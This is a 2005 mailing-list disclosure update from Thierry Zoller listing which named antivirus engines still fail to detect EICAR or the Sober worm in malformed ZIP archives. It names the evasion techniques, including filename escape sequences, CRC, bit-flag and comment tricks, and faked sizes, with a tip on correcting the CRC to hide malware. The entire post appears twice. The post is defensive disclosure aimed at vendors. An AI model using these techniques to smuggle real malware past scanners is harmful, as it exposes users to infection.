Thierry Zoller
14/06/05, 22:25
Dear List,
3 month have passed since it has been reported that some AntiVirus
engines have flaws in regards to scanning malformed ZIP archives.
This is an update on the situation and hopefully a wake up call
for some vendors.
3 month have passed and a few Anti-Virus engines _still_ are
"vulnerable" to this flaw. They either fail to detect the EICAR
string or Sober (worm) correctly in malformed ZIP archives. It should be
noted the malformed ZIP Archives open up correctly using common
ZIP tools.
Original Advisory :
ftp://ftp.aerasec.de/pub/advisories/unfiltered-escape-sequences/
2005 AERAsec Network Services and Security GmbH - Dr. Peter Bieringer
http://bipin.sosvulnerable.net/crc.html
Several Other flaws in Regards to malformed ZIP Archives.
My Anti-Virus Results from 15/03/2005 :
http://seclists.org/lists/fulldisclosure/2005/Mar/0556.html
Details as of 14/06/2005
************************
Products tested using
http://www.virustotal.com & http://virusscan.jotti.org/ :
AntiVir 6.31.0.5
AVG 718
Avira 6.31.0.5
BitDefender 7.0
ClamAV devel-20050501
DrWeb 4.32b
eTrust-Iris 7.1.194.0
eTrust-Vet 11.9.1.0
Fortinet 2.32.0.0
Ikarus 2.32
Kaspersky 4.0.2.24
McAfee 4513
NOD32v2 1.1139
Norman 5.70.10
Panda 8.02.00
Sybari 7.5.1314
Symantec 8.0
TheHacker 5.8-3.0
VBA32 3.10.3
ArcaVir
Avast
F-Prot Antivirus
no-escape-sequences-in-filename-eicar.zip
------------------------------------------
Anti-Virus products which failed this test :
Ikarus 2.32 updated on 06.14.2005
Symantec 8.0 updated on 06.13.2005
no-escape-sequences-in-filename-sober.l.zip
------------------------------------------
Failed :
Ikarus 2.32 updated 06.14.2005
unfiltered-escape-sequences-in-filename-eicar.zip
-------------------------------------------------
Failed :
Symantec 8.0
TheHacker 5.8-3.0
Ikarus 2.32
unfiltered-escape-sequences-in-filename-sober.l.zip
---------------------------------------------------
Failed :
TheHacker 5.8-3.0
Ikarus 2.32
AVG (ONLY ON JOTTI, Test done multiple times)
mixed2-eicar.zip AND mixed3-eicar.zip
---------------------------------------------------
Failed:
Symantec 8.0
TheHacker 5.8-3.0
Ikarus 2.32
mixed4-eicar.zip AND mixed-eicar-1.zip
---------------------------------------------------
Failed:
Ikarus 2.32
eicarcom2.zip
---------------------------------------------------
No Failures.
crc.zip (malformed CRC checksum)
---------------------------------------------------
Failed :
Symantec 8.0
NOD32 (ONLY ON JOTTI, Test done multiple times
VirusTotal gives : incorrect CRC checksum, the file may be
damaged)
gpbf.zip (general purpose bit flag hack)
---------------------------------------------------
Failed:
F-Prot Antivirus
Norman Virus Control (Jotti and VirusTotal)
ArcaVir
Symantec
long_coment.zip (long archive comment)
---------------------------------------------------
Failed :
Avast
AVG Antivirus
Symantec 8.0
DrWeb (Failed on VirusTotal, successfull on Jotti)
Antigen.zip (fake compressed size and uncompressed size values)
---------------------------------------------------
Failed:
AntiVir
ArcaVir
Avast
BitDefender
ClamAV
Dr.Web
Fortinet
NOD32
Norman Virus Control
VBA32
Sybari 7.5.1314
Symantec 8.0
TheHacker 5.8-3.0
VBA32 3.10.3
McAfee 4513
eTrust-Iris 7.1.194.0
eTrust-Vet 11.9.1.0
(It should be noted that in order to really use this flaw to hide
malware the CRC value should be corrected AFTER changing the
compressed and uncompressed sizes)
eicar_com ♫?↔▲ยง .com .zip ( test_nav.zip)
----------------------------------------------------
Failed:
ClamAV
F-Prot Antivirus
Fortinet
Norman Virus Control
VirusTotal never managed to show the result for this file.
Regards,
Thierry Zoller
mailto:Thierry@sniff-em.com
3 month have passed since it has been reported that some AntiVirus
engines have flaws in regards to scanning malformed ZIP archives.
This is an update on the situation and hopefully a wake up call
for some vendors.
3 month have passed and a few Anti-Virus engines _still_ are
"vulnerable" to this flaw. They either fail to detect the EICAR
string or Sober (worm) correctly in malformed ZIP archives. It should be
noted the malformed ZIP Archives open up correctly using common
ZIP tools.
Original Advisory :
ftp://ftp.aerasec.de/pub/advisories/unfiltered-escape-sequences/
2005 AERAsec Network Services and Security GmbH - Dr. Peter Bieringer
http://bipin.sosvulnerable.net/crc.html
Several Other flaws in Regards to malformed ZIP Archives.
My Anti-Virus Results from 15/03/2005 :
http://seclists.org/lists/fulldisclosure/2005/Mar/0556.html
Details as of 14/06/2005
************************
Products tested using
http://www.virustotal.com & http://virusscan.jotti.org/ :
AntiVir 6.31.0.5
AVG 718
Avira 6.31.0.5
BitDefender 7.0
ClamAV devel-20050501
DrWeb 4.32b
eTrust-Iris 7.1.194.0
eTrust-Vet 11.9.1.0
Fortinet 2.32.0.0
Ikarus 2.32
Kaspersky 4.0.2.24
McAfee 4513
NOD32v2 1.1139
Norman 5.70.10
Panda 8.02.00
Sybari 7.5.1314
Symantec 8.0
TheHacker 5.8-3.0
VBA32 3.10.3
ArcaVir
Avast
F-Prot Antivirus
no-escape-sequences-in-filename-eicar.zip
------------------------------------------
Anti-Virus products which failed this test :
Ikarus 2.32 updated on 06.14.2005
Symantec 8.0 updated on 06.13.2005
no-escape-sequences-in-filename-sober.l.zip
------------------------------------------
Failed :
Ikarus 2.32 updated 06.14.2005
unfiltered-escape-sequences-in-filename-eicar.zip
-------------------------------------------------
Failed :
Symantec 8.0
TheHacker 5.8-3.0
Ikarus 2.32
unfiltered-escape-sequences-in-filename-sober.l.zip
---------------------------------------------------
Failed :
TheHacker 5.8-3.0
Ikarus 2.32
AVG (ONLY ON JOTTI, Test done multiple times)
mixed2-eicar.zip AND mixed3-eicar.zip
---------------------------------------------------
Failed:
Symantec 8.0
TheHacker 5.8-3.0
Ikarus 2.32
mixed4-eicar.zip AND mixed-eicar-1.zip
---------------------------------------------------
Failed:
Ikarus 2.32
eicarcom2.zip
---------------------------------------------------
No Failures.
crc.zip (malformed CRC checksum)
---------------------------------------------------
Failed :
Symantec 8.0
NOD32 (ONLY ON JOTTI, Test done multiple times
VirusTotal gives : incorrect CRC checksum, the file may be
damaged)
gpbf.zip (general purpose bit flag hack)
---------------------------------------------------
Failed:
F-Prot Antivirus
Norman Virus Control (Jotti and VirusTotal)
ArcaVir
Symantec
long_coment.zip (long archive comment)
---------------------------------------------------
Failed :
Avast
AVG Antivirus
Symantec 8.0
DrWeb (Failed on VirusTotal, successfull on Jotti)
Antigen.zip (fake compressed size and uncompressed size values)
---------------------------------------------------
Failed:
AntiVir
ArcaVir
Avast
BitDefender
ClamAV
Dr.Web
Fortinet
NOD32
Norman Virus Control
VBA32
Sybari 7.5.1314
Symantec 8.0
TheHacker 5.8-3.0
VBA32 3.10.3
McAfee 4513
eTrust-Iris 7.1.194.0
eTrust-Vet 11.9.1.0
(It should be noted that in order to really use this flaw to hide
malware the CRC value should be corrected AFTER changing the
compressed and uncompressed sizes)
eicar_com ♫?↔▲ยง .com .zip ( test_nav.zip)
----------------------------------------------------
Failed:
ClamAV
F-Prot Antivirus
Fortinet
Norman Virus Control
VirusTotal never managed to show the result for this file.
Regards,
Thierry Zoller
mailto:Thierry@sniff-em.com